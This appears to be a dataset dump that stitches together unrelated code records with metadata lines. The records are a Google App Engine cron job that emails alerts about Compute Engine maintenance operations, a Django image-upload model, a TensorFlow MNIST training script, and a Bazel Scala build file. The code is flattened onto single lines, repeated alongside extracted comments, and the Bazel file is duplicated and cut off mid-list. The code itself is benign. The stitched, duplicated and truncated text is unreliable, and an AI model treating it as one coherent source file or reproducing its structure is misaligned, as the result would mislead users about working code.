# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import webapp2 import httplib2 import os from pprint import pprint from datetime import datetime from datetime import timedelta from googleapiclient import discovery from google.appengine.api import mail from google.appengine.api import app_identity from google.appengine.api import memcache class CronJob(webapp2.RequestHandler): def sendNotification(self, instances, project): body = """<html><head><body><table><tr><th>instance</th><th>zone</th><th>operation</th><th>time (UTC)</th><th>duration</th></tr>%%ROWS%%</table> <br><br>check more information on <a href="https://console.cloud.google.com/compute/operations?project=%%PROJECT%%">https://console.cloud.google.com/compute/operations?project=%%PROJECT%%</a> """ rows = "" for instance in instances: tmp = ("<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % ( instance['instance'], instance['zone'], instance['operationType'], instance['startTime'], instance['duration'])) rows += tmp body = body.replace('%%ROWS%%', rows).replace("%%PROJECT%%", project) message = mail.EmailMessage( sender='<EMAIL>()), subject="Instance Operations Detected") message.to = os.environ.get('NOTIFICATION_RECEIVER') message.html = body message.send() def getOperationList(self, project): ret = [] filter = ['compute.instances.migrateOnHostMaintenance', 'compute.instances.hostError'] http = httplib2.Http() service = discovery.build("compute", "v1") request = 
service.globalOperations().aggregatedList(project=project, orderBy='creationTimestamp desc') while request is not None: response = request.execute() if 'items' not in response.keys(): break for zone in response['items']: # no operations in this zone if 'operations' not in response['items'][zone].keys(): continue for operation in response['items'][zone]['operations']: if operation['operationType'] not in filter: continue if memcache.get('__OperationId{}'.format(operation['id'])): # found in memcache, duplicated continue instance = operation['targetLink'].split('/')[-1] operationType = operation['operationType'] endTime = datetime.strptime(operation['endTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S') startTime = datetime.strptime(operation['startTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S') duration = endTime - startTime ret.append({ 'instance': instance, 'operationType': operationType.split('.')[-1], 'startTime': str(startTime), 'endTime': str(endTime), 'zone': zone.split('/')[-1], 'duration': str(duration) }) memcache.set('__OperationId{}'.format(operation['id']), 1) request = service.globalOperations().list_next(previous_request=request, previous_response=response) if len(ret) is not 0: self.sendNotification(ret, project) return len(ret) def get(self): events = self.getOperationList(os.environ.get('PROJECT_ID') or app_identity.get_application_id()) self.response.headers['Content-Type'] = 'text/plain' self.response.write('OK, {} events detected'.format(events)) class MainPage(webapp2.RequestHandler): def get(self): self.response.headers['Content-Type'] = 'text/plain' self.response.write('OK') app = webapp2.WSGIApplication([ ('/cron', CronJob), ('/.*', MainPage), ], debug=False)
en
0.757273
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <html><head><body><table><tr><th>instance</th><th>zone</th><th>operation</th><th>time (UTC)</th><th>duration</th></tr>%%ROWS%%</table> <br><br>check more information on <a href="https://console.cloud.google.com/compute/operations?project=%%PROJECT%%">https://console.cloud.google.com/compute/operations?project=%%PROJECT%%</a> # no operations in this zone # found in memcache, duplicated
2.359375
2
collect_image/models.py
ShivanS93/nutrify
1
6627921
import os from django_countries.fields import CountryField from django.contrib.postgres.fields import ArrayField from django.db import models from django.utils.deconstruct import deconstructible from hashid_field import HashidAutoField, Hashid from config.settings import HASHID_FIELD_SALT, AUTH_USER_MODEL @deconstructible class RenameImage(object): """ Renaming the image to the pk """ def __init__(self, sub_path): self.sub_path = sub_path def __call__(self, instance, filename): ext = filename.split(".")[-1] # hash'd name, also the reference_id does not equal the name # of the image file in storage hashname = Hashid( FoodImage.objects.all().count(), salt=f"{instance.date_uploaded}{HASHID_FIELD_SALT}", min_length=7, ) filename = f"{hashname}.{ext}" return os.path.join(self.sub_path, filename) class FoodImage(models.Model): date_uploaded = models.DateTimeField(auto_now_add=True, editable=False) reference_id = HashidAutoField( primary_key=True, salt=f"{date_uploaded}{HASHID_FIELD_SALT}", ) country = CountryField(null=True) image = models.ImageField( upload_to=RenameImage("food_images"), blank=False ) receipe = ArrayField(models.CharField(max_length=255), blank=False) owner = models.ForeignKey( AUTH_USER_MODEL, on_delete=models.CASCADE, default=None, null=True ) def __str__(self): return f"{self.date_uploaded}-{self.reference_id}"
import os from django_countries.fields import CountryField from django.contrib.postgres.fields import ArrayField from django.db import models from django.utils.deconstruct import deconstructible from hashid_field import HashidAutoField, Hashid from config.settings import HASHID_FIELD_SALT, AUTH_USER_MODEL @deconstructible class RenameImage(object): """ Renaming the image to the pk """ def __init__(self, sub_path): self.sub_path = sub_path def __call__(self, instance, filename): ext = filename.split(".")[-1] # hash'd name, also the reference_id does not equal the name # of the image file in storage hashname = Hashid( FoodImage.objects.all().count(), salt=f"{instance.date_uploaded}{HASHID_FIELD_SALT}", min_length=7, ) filename = f"{hashname}.{ext}" return os.path.join(self.sub_path, filename) class FoodImage(models.Model): date_uploaded = models.DateTimeField(auto_now_add=True, editable=False) reference_id = HashidAutoField( primary_key=True, salt=f"{date_uploaded}{HASHID_FIELD_SALT}", ) country = CountryField(null=True) image = models.ImageField( upload_to=RenameImage("food_images"), blank=False ) receipe = ArrayField(models.CharField(max_length=255), blank=False) owner = models.ForeignKey( AUTH_USER_MODEL, on_delete=models.CASCADE, default=None, null=True ) def __str__(self): return f"{self.date_uploaded}-{self.reference_id}"
en
0.926393
Renaming the image to the pk # hash'd name, also the reference_id does not equal the name # of the image file in storage
2.155383
2
tfmodule/trainer.py
kangyounglee/tf-code-pattern-lenet5
1
6627922
<reponame>kangyounglee/tf-code-pattern-lenet5 # Copyright 2018 <NAME> (<EMAIL>) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================================== # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf import numpy as np import time from train_config import TrainConfig from data_loader import MnistDataLoader from data_loader import FileManager from model_builder import get_model from model_config import model_config def train(dataloader_train,dataloader_test,trainconfig_worker): # model building ========================= model_in = tf.placeholder(dtype=model_config['image_dtype'], shape=[None, dataloader_train.IMAGE_SIZE, dataloader_train.IMAGE_SIZE, dataloader_train.NUM_CHANNELS]) labels = tf.placeholder(dtype=model_config['label_dtype'], shape=[None]) with tf.variable_scope(name_or_scope='model',values=[model_in, labels]): dropout_keeprate_node = tf.placeholder(dtype=model_config['image_dtype']) model_out = get_model(model_in =model_in, dropout_keeprate_node =dropout_keeprate_node, train_config =trainconfig_worker, scope ='model') # tf data loading =================================================== with tf.name_scope(name='dataloader'): images_placeholder = tf.placeholder( dtype=model_config['image_dtype'], shape=dataloader_train.image_shape) label_placeholder = tf.placeholder( dtype=model_config['label_dtype'], 
shape=[None]) train_dataset = dataloader_train.input_fn(images_placeholder,label_placeholder) train_iterator = train_dataset.make_initializable_iterator() # traning ops ============================================= loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels,logits=model_out)) train_op = tf.train.AdamOptimizer(learning_rate=trainconfig_worker.learning_rate).minimize(loss=loss_op) with tf.name_scope('model_out'): model_pred = tf.nn.softmax(model_out) with tf.name_scope('eval_performance'): error = tf.equal(tf.argmax(model_pred,1),labels) tf_pred_accuracy = tf.reduce_mean(tf.cast(error,tf.float32)) # For Tensorboard =========================================== file_writer = tf.summary.FileWriter(logdir=trainconfig_worker.tflogdir) file_writer.add_graph(tf.get_default_graph()) tb_summary_accuracy_train = tf.summary.scalar('accuracy_train', tf_pred_accuracy) tb_summary_accuracy_test = tf.summary.scalar('accuracy_test', tf_pred_accuracy) tb_summary_cost = tf.summary.scalar('loss', loss_op) # training ============================== train_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) test_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) init_var = tf.global_variables_initializer() print('[train] training_epochs = %s' % trainconfig_worker.training_epochs) print('------------------------------------') with tf.Session() as sess: # Run the variable initializer sess.run(init_var) # importing data image_train_numpy, label_train_numpy = \ dataloader_train.import_data(imagefilename=fm.train_images_filename, labelfilename=fm.train_labels_filename) image_test_numpy, label_test_numpy = \ dataloader_test.import_data(imagefilename=fm.test_images_filename, labelfilename=fm.test_labels_filename) sess.run(train_iterator.initializer, feed_dict={images_placeholder: 
image_train_numpy, label_placeholder: label_train_numpy}) images_train_op, labels_train_op = train_iterator.get_next() avg_cost = 0. rate_record_index = 0 for epoch in range(trainconfig_worker.training_epochs): start_time = time.time() image_train_batch, label_train_batch = sess.run([images_train_op, labels_train_op]) _, minibatch_cost = sess.run([train_op,loss_op], feed_dict={model_in: image_train_batch, labels: label_train_batch, dropout_keeprate_node: trainconfig_worker.dropout_keeprate}) # compute average cost and error rate avg_cost += minibatch_cost if trainconfig_worker.display_step == 0: continue elif epoch % trainconfig_worker.display_step == 0: elapsed_time = time.time() - start_time train_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node: 1.0})) *100.0 test_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node: 1.0})) * 100.0 tb_summary_cost_result, tb_summary_accuracy_train_result = sess.run([tb_summary_cost,tb_summary_accuracy_train], feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node:1.0}) tb_summary_accuracy_test_result = sess.run(tb_summary_accuracy_test, feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node:1.0}) file_writer.add_summary(tb_summary_cost_result,epoch) file_writer.add_summary(tb_summary_accuracy_train_result,epoch) file_writer.add_summary(tb_summary_accuracy_test_result,epoch) print('At epoch = %d, elapsed_time = %.1f ms' % (epoch, elapsed_time)) # print("Training set avg cost (avg over minibatches)=%.2f" % avg_cost) print("Training set Err rate (avg over minibatches)= %.2f %% " % (train_error_rate[rate_record_index])) print("Test set Err rate (total batch)= %.2f %%" % (test_error_rate[rate_record_index])) print("--------------------------------------------") 
rate_record_index += 1 print("Training finished!") file_writer.close() if __name__ == '__main__': tf.logging.set_verbosity(tf.logging.INFO) trainconfig_worker = TrainConfig() fm = FileManager() # dataloader instance gen dataloader_train = MnistDataLoader(is_training =trainconfig_worker.is_trainable, datasize =trainconfig_worker.train_data_size, batch_size =trainconfig_worker.batch_size, multiprocessing_num=trainconfig_worker.multiprocessing_num, is_image_scaling =True) dataloader_test = MnistDataLoader(is_training =False, datasize =trainconfig_worker.test_data_size) # model tranining with tf.name_scope(name='trainer',values=[dataloader_train,dataloader_test]): train(dataloader_train=dataloader_train, dataloader_test = dataloader_test, trainconfig_worker=trainconfig_worker)
# Copyright 2018 <NAME> (<EMAIL>) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================================== # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf import numpy as np import time from train_config import TrainConfig from data_loader import MnistDataLoader from data_loader import FileManager from model_builder import get_model from model_config import model_config def train(dataloader_train,dataloader_test,trainconfig_worker): # model building ========================= model_in = tf.placeholder(dtype=model_config['image_dtype'], shape=[None, dataloader_train.IMAGE_SIZE, dataloader_train.IMAGE_SIZE, dataloader_train.NUM_CHANNELS]) labels = tf.placeholder(dtype=model_config['label_dtype'], shape=[None]) with tf.variable_scope(name_or_scope='model',values=[model_in, labels]): dropout_keeprate_node = tf.placeholder(dtype=model_config['image_dtype']) model_out = get_model(model_in =model_in, dropout_keeprate_node =dropout_keeprate_node, train_config =trainconfig_worker, scope ='model') # tf data loading =================================================== with tf.name_scope(name='dataloader'): images_placeholder = tf.placeholder( dtype=model_config['image_dtype'], shape=dataloader_train.image_shape) label_placeholder = tf.placeholder( dtype=model_config['label_dtype'], shape=[None]) train_dataset = 
dataloader_train.input_fn(images_placeholder,label_placeholder) train_iterator = train_dataset.make_initializable_iterator() # traning ops ============================================= loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels,logits=model_out)) train_op = tf.train.AdamOptimizer(learning_rate=trainconfig_worker.learning_rate).minimize(loss=loss_op) with tf.name_scope('model_out'): model_pred = tf.nn.softmax(model_out) with tf.name_scope('eval_performance'): error = tf.equal(tf.argmax(model_pred,1),labels) tf_pred_accuracy = tf.reduce_mean(tf.cast(error,tf.float32)) # For Tensorboard =========================================== file_writer = tf.summary.FileWriter(logdir=trainconfig_worker.tflogdir) file_writer.add_graph(tf.get_default_graph()) tb_summary_accuracy_train = tf.summary.scalar('accuracy_train', tf_pred_accuracy) tb_summary_accuracy_test = tf.summary.scalar('accuracy_test', tf_pred_accuracy) tb_summary_cost = tf.summary.scalar('loss', loss_op) # training ============================== train_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) test_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) init_var = tf.global_variables_initializer() print('[train] training_epochs = %s' % trainconfig_worker.training_epochs) print('------------------------------------') with tf.Session() as sess: # Run the variable initializer sess.run(init_var) # importing data image_train_numpy, label_train_numpy = \ dataloader_train.import_data(imagefilename=fm.train_images_filename, labelfilename=fm.train_labels_filename) image_test_numpy, label_test_numpy = \ dataloader_test.import_data(imagefilename=fm.test_images_filename, labelfilename=fm.test_labels_filename) sess.run(train_iterator.initializer, feed_dict={images_placeholder: image_train_numpy, 
label_placeholder: label_train_numpy}) images_train_op, labels_train_op = train_iterator.get_next() avg_cost = 0. rate_record_index = 0 for epoch in range(trainconfig_worker.training_epochs): start_time = time.time() image_train_batch, label_train_batch = sess.run([images_train_op, labels_train_op]) _, minibatch_cost = sess.run([train_op,loss_op], feed_dict={model_in: image_train_batch, labels: label_train_batch, dropout_keeprate_node: trainconfig_worker.dropout_keeprate}) # compute average cost and error rate avg_cost += minibatch_cost if trainconfig_worker.display_step == 0: continue elif epoch % trainconfig_worker.display_step == 0: elapsed_time = time.time() - start_time train_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node: 1.0})) *100.0 test_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node: 1.0})) * 100.0 tb_summary_cost_result, tb_summary_accuracy_train_result = sess.run([tb_summary_cost,tb_summary_accuracy_train], feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node:1.0}) tb_summary_accuracy_test_result = sess.run(tb_summary_accuracy_test, feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node:1.0}) file_writer.add_summary(tb_summary_cost_result,epoch) file_writer.add_summary(tb_summary_accuracy_train_result,epoch) file_writer.add_summary(tb_summary_accuracy_test_result,epoch) print('At epoch = %d, elapsed_time = %.1f ms' % (epoch, elapsed_time)) # print("Training set avg cost (avg over minibatches)=%.2f" % avg_cost) print("Training set Err rate (avg over minibatches)= %.2f %% " % (train_error_rate[rate_record_index])) print("Test set Err rate (total batch)= %.2f %%" % (test_error_rate[rate_record_index])) print("--------------------------------------------") rate_record_index += 1 
print("Training finished!") file_writer.close() if __name__ == '__main__': tf.logging.set_verbosity(tf.logging.INFO) trainconfig_worker = TrainConfig() fm = FileManager() # dataloader instance gen dataloader_train = MnistDataLoader(is_training =trainconfig_worker.is_trainable, datasize =trainconfig_worker.train_data_size, batch_size =trainconfig_worker.batch_size, multiprocessing_num=trainconfig_worker.multiprocessing_num, is_image_scaling =True) dataloader_test = MnistDataLoader(is_training =False, datasize =trainconfig_worker.test_data_size) # model tranining with tf.name_scope(name='trainer',values=[dataloader_train,dataloader_test]): train(dataloader_train=dataloader_train, dataloader_test = dataloader_test, trainconfig_worker=trainconfig_worker)
en
0.72297
# Copyright 2018 <NAME> (<EMAIL>) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================================== # -*- coding: utf-8 -*- # model building ========================= # tf data loading =================================================== # traning ops ============================================= # For Tensorboard =========================================== # training ============================== # Run the variable initializer # importing data # compute average cost and error rate # print("Training set avg cost (avg over minibatches)=%.2f" % avg_cost) # dataloader instance gen # model tranining
2.242902
2
bazel_tools/scala.bzl
gaborh-da/daml
0
6627923
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 load( "@io_bazel_rules_scala//scala:scala.bzl", "scala_binary", "scala_library", "scala_macro_library", "scala_test", "scala_test_suite", ) load( "@io_bazel_rules_scala//jmh:jmh.bzl", "scala_benchmark_jmh", ) load("//bazel_tools:pom_file.bzl", "pom_file") load("@os_info//:os_info.bzl", "is_windows") # This file defines common Scala compiler flags and plugins used throughout # this repository. The initial set of flags is taken from the ledger-client # project. If you find that additional flags are required for another project, # consider whether all projects could benefit from these changes. If so, add # them here. # # Use the macros `da_scala_*` defined in this file, instead of the stock rules # `scala_*` from `rules_scala` in order for these default flags to take effect. common_scalacopts = [ # doesn't allow advance features of the language without explict import # (higherkinds, implicits) "-feature", "-target:jvm-1.8", "-encoding", "UTF-8", # more detailed information about type-erasure related warnings "-unchecked", # warn if using deprecated stuff "-deprecation", "-Xfuture", # better error reporting for pureconfig "-Xmacro-settings:materialize-derivations", "-Xfatal-warnings", # adapted args is a deprecated feature: # `def foo(a: (A, B))` can be called with `foo(a, b)`. 
# properly it should be `foo((a,b))` "-Yno-adapted-args", "-Ywarn-dead-code", # Warn about implicit conversion between numerical types "-Ywarn-numeric-widen", # Gives a warning for functions declared as returning Unit, but the body returns a value "-Ywarn-value-discard", "-Ywarn-unused-import", # unfortunately give false warning for the `(a, b) = someTuple` # line inside a for comprehension # "-Ywarn-unused" ] plugin_deps = [ "//3rdparty/jvm/org/wartremover:wartremover", ] common_plugins = [ "//external:jar/org/wartremover/wartremover_2_12", ] plugin_scalacopts = [ # do not enable wart remover for now, because we need to fix a lot of # test code, which didn't have wart remover enabled before "-Xplugin-require:wartremover", # This lists all wartremover linting passes. # The list of enabled ones is pretty arbitrary, please ping Francesco for # info "-P:wartremover:traverser:org.wartremover.warts.Any", "-P:wartremover:traverser:org.wartremover.warts.AnyVal", "-P:wartremover:traverser:org.wartremover.warts.ArrayEquals", # "-P:wartremover:traverser:org.wartremover.warts.AsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.DefaultArguments", # "-P:wartremover:traverser:org.wartremover.warts.EitherProjectionPartial", "-P:wartremover:traverser:org.wartremover.warts.Enumeration", # "-P:wartremover:traverser:org.wartremover.warts.Equals", "-P:wartremover:traverser:org.wartremover.warts.ExplicitImplicitTypes", # "-P:wartremover:traverser:org.wartremover.warts.FinalCaseClass", # "-P:wartremover:traverser:org.wartremover.warts.FinalVal", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitConversion", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitParameter", # "-P:wartremover:traverser:org.wartremover.warts.IsInstanceOf", "-P:wartremover:traverser:org.wartremover.warts.JavaSerializable", "-P:wartremover:traverser:org.wartremover.warts.LeakingSealed", # "-P:wartremover:traverser:org.wartremover.warts.MutableDataStructures", # 
"-P:wartremover:traverser:org.wartremover.warts.NonUnitStatements", # "-P:wartremover:traverser:org.wartremover.warts.Nothing", # "-P:wartremover:traverser:org.wartremover.warts.Null", "-P:wartremover:traverser:org.wartremover.warts.Option2Iterable", # "-P:wartremover:traverser:org.wartremover.warts.OptionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Overloading", "-P:wartremover:traverser:org.wartremover.warts.Product", # "-P:wartremover:traverser:org.wartremover.warts.PublicInference", # "-P:wartremover:traverser:org.wartremover.warts.Recursion", "-P:wartremover:traverser:org.wartremover.warts.Return", "-P:wartremover:traverser:org.wartremover.warts.Serializable", "-P:wartremover:traverser:org.wartremover.warts.StringPlusAny", # "-P:wartremover:traverser:org.wartremover.warts.Throw", # "-P:wartremover:traverser:org.wartremover.warts.ToString", # "-P:wartremover:traverser:org.wartremover.warts.TraversableOps", # "-P:wartremover:traverser:org.wartremover.warts.TryPartial", # "-P:wartremover:traverser:org.wartremover.warts.Var", # "-P:wartremover:traverser:org.wartremover.warts.While", ] # delete items from lf_scalacopts as they are restored to common_scalacopts and plugin_scalacopts # # calculate items to delete # $ python # ... copypaste ... 
# >>> filter(set(common_scalacopts + plugin_scalacopts).__contains__, lf_scalacopts) # [] # ^ means nothing to remove lf_scalacopts = [ "-Ywarn-unused", ] def _wrap_rule(rule, name = "", scalacopts = [], plugins = [], **kwargs): rule( name = name, scalacopts = common_scalacopts + plugin_scalacopts + scalacopts, plugins = common_plugins + plugins, **kwargs ) def _wrap_rule_no_plugins(rule, scalacopts = [], **kwargs): rule( scalacopts = common_scalacopts + scalacopts, **kwargs ) def _strip_path_upto(path, upto): idx = path.find(upto) if idx >= 0: return [path[idx + len(upto):].strip("/")] else: return [] def _scala_source_jar_impl(ctx): zipper_args = [ "%s=%s" % (new_path, src.path) for src in ctx.files.srcs for new_path in _strip_path_upto(src.path, ctx.attr.strip_upto) ] zipper_args_file = ctx.actions.declare_file( ctx.label.name + ".zipper_args", ) manifest_file = ctx.actions.declare_file( ctx.label.name + "_MANIFEST.MF", sibling = zipper_args_file, ) ctx.actions.write(manifest_file, "Manifest-Version: 1.0\n") zipper_args += ["META-INF/MANIFEST.MF=" + manifest_file.path + "\n"] ctx.actions.write(zipper_args_file, "\n".join(zipper_args)) ctx.actions.run( executable = ctx.executable._zipper, inputs = ctx.files.srcs + [manifest_file, zipper_args_file], outputs = [ctx.outputs.out], arguments = ["c", ctx.outputs.out.path, "@" + zipper_args_file.path], mnemonic = "ScalaSourceJar", ) scala_source_jar = rule( implementation = _scala_source_jar_impl, attrs = { "srcs": attr.label_list(allow_files = True), # The string to strip up to from source file paths. # E.g. "main/scala" strips "foo/src/main/scala/com/daml/Foo.scala" # to "com/daml/Foo.scala". # Files not matching are not included in the source jar, # so you may end up with empty source jars. # TODO(JM): Add support for multiple options. 
"strip_upto": attr.string(default = "main/scala"), "_zipper": attr.label( default = Label("@bazel_tools//tools/zip:zipper"), cfg = "host", executable = True, allow_files = True, ), }, outputs = { "out": "%{name}.jar", }, ) def _create_scala_source_jar(**kwargs): # Try to not create empty source jars. We may still end up # with them if the "strip_upto" does not match any of the # paths. if len(kwargs["srcs"]) > 0: scala_source_jar( name = kwargs["name"] + "_src", srcs = kwargs["srcs"], ) def da_scala_library(name, **kwargs): """ Define a Scala library. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_library, name, **kwargs) _create_scala_source_jar(**(kwargs + {"name": name})) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_macro_library(**kwargs): """ Define a Scala library that contains macros. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_macro_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_macro_library, **kwargs) _create_scala_source_jar(**kwargs) def da_scala_binary(name, **kwargs): """ Define a Scala executable. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_binary` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. 
[rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_binary """ _wrap_rule(scala_binary, name, **kwargs) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_test(**kwargs): """ Define a Scala executable that runs the unit tests in the given source files. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test """ _wrap_rule(scala_test, **kwargs) def da_scala_test_suite(**kwargs): """ Define a Scala test executable for each source file and bundle them into one target. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test_suite` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test_suite """ _wrap_rule(scala_test_suite, use_short_names = is_windows, **kwargs) # TODO make the jmh rule work with plugins -- probably # just a matter of passing the flag in def da_scala_benchmark_jmh(**kwargs): _wrap_rule_no_plugins(scala_benchmark_jmh, **kwargs)
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 load( "@io_bazel_rules_scala//scala:scala.bzl", "scala_binary", "scala_library", "scala_macro_library", "scala_test", "scala_test_suite", ) load( "@io_bazel_rules_scala//jmh:jmh.bzl", "scala_benchmark_jmh", ) load("//bazel_tools:pom_file.bzl", "pom_file") load("@os_info//:os_info.bzl", "is_windows") # This file defines common Scala compiler flags and plugins used throughout # this repository. The initial set of flags is taken from the ledger-client # project. If you find that additional flags are required for another project, # consider whether all projects could benefit from these changes. If so, add # them here. # # Use the macros `da_scala_*` defined in this file, instead of the stock rules # `scala_*` from `rules_scala` in order for these default flags to take effect. common_scalacopts = [ # doesn't allow advance features of the language without explict import # (higherkinds, implicits) "-feature", "-target:jvm-1.8", "-encoding", "UTF-8", # more detailed information about type-erasure related warnings "-unchecked", # warn if using deprecated stuff "-deprecation", "-Xfuture", # better error reporting for pureconfig "-Xmacro-settings:materialize-derivations", "-Xfatal-warnings", # adapted args is a deprecated feature: # `def foo(a: (A, B))` can be called with `foo(a, b)`. 
# properly it should be `foo((a,b))` "-Yno-adapted-args", "-Ywarn-dead-code", # Warn about implicit conversion between numerical types "-Ywarn-numeric-widen", # Gives a warning for functions declared as returning Unit, but the body returns a value "-Ywarn-value-discard", "-Ywarn-unused-import", # unfortunately give false warning for the `(a, b) = someTuple` # line inside a for comprehension # "-Ywarn-unused" ] plugin_deps = [ "//3rdparty/jvm/org/wartremover:wartremover", ] common_plugins = [ "//external:jar/org/wartremover/wartremover_2_12", ] plugin_scalacopts = [ # do not enable wart remover for now, because we need to fix a lot of # test code, which didn't have wart remover enabled before "-Xplugin-require:wartremover", # This lists all wartremover linting passes. # The list of enabled ones is pretty arbitrary, please ping Francesco for # info "-P:wartremover:traverser:org.wartremover.warts.Any", "-P:wartremover:traverser:org.wartremover.warts.AnyVal", "-P:wartremover:traverser:org.wartremover.warts.ArrayEquals", # "-P:wartremover:traverser:org.wartremover.warts.AsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.DefaultArguments", # "-P:wartremover:traverser:org.wartremover.warts.EitherProjectionPartial", "-P:wartremover:traverser:org.wartremover.warts.Enumeration", # "-P:wartremover:traverser:org.wartremover.warts.Equals", "-P:wartremover:traverser:org.wartremover.warts.ExplicitImplicitTypes", # "-P:wartremover:traverser:org.wartremover.warts.FinalCaseClass", # "-P:wartremover:traverser:org.wartremover.warts.FinalVal", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitConversion", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitParameter", # "-P:wartremover:traverser:org.wartremover.warts.IsInstanceOf", "-P:wartremover:traverser:org.wartremover.warts.JavaSerializable", "-P:wartremover:traverser:org.wartremover.warts.LeakingSealed", # "-P:wartremover:traverser:org.wartremover.warts.MutableDataStructures", # 
